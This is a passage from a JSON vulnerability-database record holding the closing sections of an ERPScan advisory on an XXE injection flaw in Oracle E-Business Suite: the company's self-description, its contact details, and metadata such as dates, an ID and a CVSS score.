SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
